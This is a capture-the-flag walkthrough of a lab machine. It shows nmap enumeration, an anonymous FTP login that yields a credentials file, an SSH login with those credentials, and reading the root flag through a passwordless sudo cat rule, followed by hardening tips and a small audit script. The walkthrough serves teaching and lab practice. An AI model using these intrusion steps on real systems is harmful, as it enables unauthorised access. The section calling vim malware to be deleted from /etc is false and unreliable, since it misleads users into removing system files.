oopsie

Prenote

This box was made by one of my friends, from my CTF team, The WINRaRs. The creator's name is fieldraccoon, go show him some love <3

Enumeration

Firstly, let's start with an nmap scan.

☁  oopsie  nmap -T4 -A -v 10.10.129.130 > scan.txt
☁  oopsie  cat scan.txt

Nmap scan report for 10.10.129.130
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            14 Dec 27 07:42 creds.txt
|_-rw-r--r--    1 ftp      ftp            17 Dec 27 07:10 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.20.228
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 2a:21:f6:7e:2e:3a:d4:db:7a:5b:70:94:c4:c2:74:28 (DSA)
|   2048 ab:40:78:0e:ae:9f:65:23:de:f9:3b:1f:24:1e:67:a2 (RSA)
|   256 3d:87:4d:70:56:d4:1b:09:9c:6c:f3:5b:66:c7:42:bf (ECDSA)
|_  256 a5:70:42:45:b8:ca:a9:70:6d:13:4f:9b:5f:23:03:6e (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Interesting: we see 2 ports open, an ftp service with anonymous login allowed, and 2 files listed on it, creds.txt and test.txt.

Foothold

Well, let's try logging in to this ftp server anonymously.

☁  oopsie  ftp 10.10.129.130
Connected to 10.10.129.130.
220 (vsFTPd 3.0.2)
Name (10.10.129.130:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

When connecting to an anonymous ftp server, you often do not need a password, so when prompted for one, just press enter.

We're in. Let's go to passive mode and find these files.

ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,129,130,163,156).
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            14 Dec 27 07:42 creds.txt
-rw-r--r--    1 ftp      ftp            17 Dec 27 07:10 test.txt

Files! Let's read them both.

ftp> get creds.txt -
remote: creds.txt
227 Entering Passive Mode (10,10,129,130,249,6).
150 Opening BINARY mode data connection for creds.txt (14 bytes).
john:P@ssw0rd
226 Transfer complete.
14 bytes received in 0.00 secs (402.1140 kB/s)
ftp> get test.txt -
remote: test.txt
227 Entering Passive Mode (10,10,129,130,71,210).
150 Opening BINARY mode data connection for test.txt (17 bytes).
vsftpd test file
226 Transfer complete.
17 bytes received in 0.00 secs (721.8071 kB/s)

Of these, the most interesting find is the credential pair

john:P@ssw0rd

Can we potentially use this elsewhere?

User

Referring back to our nmap scan, we see the ssh service is also running. Maybe we can use these creds to log in over ssh.

kali➜~» ssh john@10.10.129.130 [13:56:24]
The authenticity of host '10.10.129.130 (10.10.129.130)' can't be established.
ECDSA key fingerprint is SHA256:3/TUzfGxOPu2WgEO2RBkKDGxQPn+CsscxVBenTzhIa4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.129.130' (ECDSA) to the list of known hosts.
john@10.10.129.130's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

And we're in. Let's check for a user flag.

john@ubuntu:~$ ls
examples.desktop  user.txt
john@ubuntu:~$ cat user.txt
flag{i_hope_this_worked}

Yay! User!

Root (method 1)

Let's go one directory level up and have a look for other directories we could potentially access.

john@ubuntu:~$ cd ..
john@ubuntu:/home$ ls
fieldraccoon  ftptest  ftp-testuser  john

Let's start off by going into fieldraccoon's directory.

john@ubuntu:/home$ cd fieldraccoon/
john@ubuntu:/home/fieldraccoon$ ls
Desktop  Documents  Downloads  examples.desktop  Music  new-vm  Pictures  Public  Templates  Videos

One of these directories is suspicious: new-vm. Let's go in there and delve further.

john@ubuntu:/home/fieldraccoon$ cd new-vm/
john@ubuntu:/home/fieldraccoon/new-vm$ ls
data
john@ubuntu:/home/fieldraccoon/new-vm$ cd data/
john@ubuntu:/home/fieldraccoon/new-vm/data$ ls
our_vsftpd.conf  setup.sh

Weird, what's this script? Let's have a read of it and work out what it does.

john@ubuntu:/home/fieldraccoon/new-vm/data$ cat setup.sh
sudo apt-get update

sudo apt-get install -y vsftpd
sudo apt-get install -y openssh-server 

# ssh s**t
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.factory-defaults
sudo chmod a-w /etc/ssh/sshd_config.factory-defaults
sudo systemctl restart ssh

# ftp firewall allow
sudo ufw allow 20/tcp
sudo ufw allow 21/tcp

# ftp config
sudo cp data/our_vsftpd.conf /etc/vsftpd.conf
sudo service vsftpd restart

# ftp file serve
sudo mkdir -p /var/ftp/pub
sudo chown nobody:nogroup /var/ftp/pub
echo "john:P@ssw0rd" | sudo tee /var/ftp/pub/creds.txt

sudo bash -c 'echo "flag{i_hope_this_worked}" > /home/john/user.txt'
sudo chown john:john /home/john/user.txt
sudo chmod u+rx /home/john/user.txt
sudo chmod u-w /home/john/user.txt
sudo chmod go-rwx /home/john

sudo bash -c 'echo "flag{root_flag_poggers}" > /root/root.txt'
sudo chown root:root /root/root.txt
sudo chmod u+rx /root/root.txt
sudo chmod u-w /root/root.txt
sudo chmod go-rwx /root

Interesting, this may have been a script the creator ran to set up the machine and forgot to remove. Line 30 shows:

sudo bash -c 'echo "flag{root_flag_poggers}" > /root/root.txt'

This shows the flag being echoed into the root flag file, so maybe we can try submitting it as the root flag?

It worked!

Root (method 2)

Let's give sudo -l a run to see what we can do.

john@ubuntu:/$ sudo -l
Matching Defaults entries for john on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

Wow, we can run cat as root without a password! Let's guess where the root flag would be hiding and cat it.

john@ubuntu:/$ sudo cat /root/root.txt
flag{root_flag_poggers}

It worked!

Root (method 3)

Tired and out of options, let's try social engineering! I kindly asked the author what the account password was. He obliged.

Let's try this with the name fieldraccoon.

kali➜~» ssh fieldraccoon@10.10.185.114 [14:42:52]
fieldraccoon@10.10.185.114's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun Dec 27 03:26:21 2020 from 192.168.42.129

And we're in. Let's get the root flag.

fieldraccoon@ubuntu:~$ sudo su
[sudo] password for fieldraccoon: 
root@ubuntu:/home/fieldraccoon# ls
Desktop  Documents  Downloads  examples.desktop  Music  new-vm  Pictures  Public  Templates  Videos
root@ubuntu:/home/fieldraccoon# cd
root@ubuntu:~# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
flag{root_flag_poggers}

It worked!

Lessons to learn: Hardening your own machine's services

Our first step towards user was exploiting anonymous ftp. Let's harden ftp so it can't be exploited in future.

This can be done by opening /etc/vsftpd.conf and setting anonymous_enable=NO.

Have a check on your own Ubuntu machine to see whether this is set.
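As an added example (not part of the original writeup), here is a small audit script covering both the anonymous ftp setting above and the NOPASSWD sudo rule that method 2 found with sudo -l. It runs against constructed sample files so it works offline; the function names are my own, and to check a real box you would point them at /etc/vsftpd.conf and /etc/sudoers instead.

```shell
#!/bin/sh
# Added example, not part of the original writeup: a small audit for the
# two misconfigurations this box relied on, run against constructed
# sample files so it works offline. Function names are my own.

# Effective anonymous_enable setting of a vsftpd.conf: comments are
# ignored, the last assignment wins, and a missing directive falls back
# to vsftpd's built-in default, which is YES.
vsftpd_anon_status() {
    val=$(sed -n 's/^[[:space:]]*anonymous_enable[[:space:]]*=[[:space:]]*\([A-Za-z0-9]*\).*/\1/p' "$1" | tail -n 1)
    val=$(printf '%s' "${val:-YES}" | tr '[:lower:]' '[:upper:]')
    case "$val" in
        YES|TRUE|1) echo enabled ;;
        *)          echo disabled ;;
    esac
}

# Every active (non-comment) sudoers rule that grants NOPASSWD.
sudo_nopasswd_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' || true
}

# Constructed samples: a vsftpd.conf with anonymous login on, as on the
# box, and a hardened copy with the directive set to NO.
tmp=$(mktemp -d)
cat > "$tmp/vsftpd.conf.weak" <<'EOF'
listen=YES
# anonymous_enable=NO   (commented out, so it does not count)
anonymous_enable=YES
local_enable=YES
EOF
sed 's/^anonymous_enable=.*/anonymous_enable=NO/' "$tmp/vsftpd.conf.weak" > "$tmp/vsftpd.conf.fixed"

# Constructed sudoers fragment matching what sudo -l showed for john.
cat > "$tmp/sudoers.sample" <<'EOF'
root    ALL=(ALL:ALL) ALL
john    ALL=(ALL) NOPASSWD: /bin/cat
EOF

echo "weak vsftpd.conf:  anonymous login $(vsftpd_anon_status "$tmp/vsftpd.conf.weak")"
echo "fixed vsftpd.conf: anonymous login $(vsftpd_anon_status "$tmp/vsftpd.conf.fixed")"
echo "NOPASSWD sudo rules (each one is a passwordless root path):"
sudo_nopasswd_rules "$tmp/sudoers.sample"
rm -rf "$tmp"
```

After changing vsftpd.conf, restart vsftpd (as the box's own setup.sh does with service vsftpd restart) so the new setting takes effect.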

Lessons to learn 2: Deleting setup scripts

This is a pretty easy thing to do. Before putting a machine in production, make sure no setup scripts have been left behind, and remove any you find.

root@ubuntu:/# ls
bin  boot  cdrom  dev  etc  home  initrd.img  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz
root@ubuntu:/# cd home
root@ubuntu:/home# ls
fieldraccoon  ftptest  ftp-testuser  john
root@ubuntu:/home# cd fieldraccoon
root@ubuntu:/home/fieldraccoon# ls
Desktop  Documents  Downloads  examples.desktop  Music  new-vm  Pictures  Public  Templates  Videos
root@ubuntu:/home/fieldraccoon# cd new-vm/data
root@ubuntu:/home/fieldraccoon/new-vm/data# rm setup.sh 
root@ubuntu:/home/fieldraccoon/new-vm/data# ls
our_vsftpd.conf

Making our machine more secure!

Lessons to learn 3: Removing malware

There is a piece of malware installed on every linux machine named vim. Please delete this at your earliest convenience, as it is bad for the system.

This can be done via the following:

root@ubuntu:~# cd /etc/vim
root@ubuntu:/etc/vim# ls
vimrc  vimrc.tiny
root@ubuntu:/etc/vim# rm vimrc
root@ubuntu:/etc/vim# rm vimrc.tiny
root@ubuntu:/etc/vim# cd ..
root@ubuntu:/etc# rmdir vim
root@ubuntu:/etc#

Malware is gone!

Final Thoughts

I hope you enjoyed this writeup. Skills learnt here involve:

  • Enumeration via nmap

  • Exploitation of anonymous ftp

  • Checking directories for flags.

  • Hardening ftp

  • Removing vim
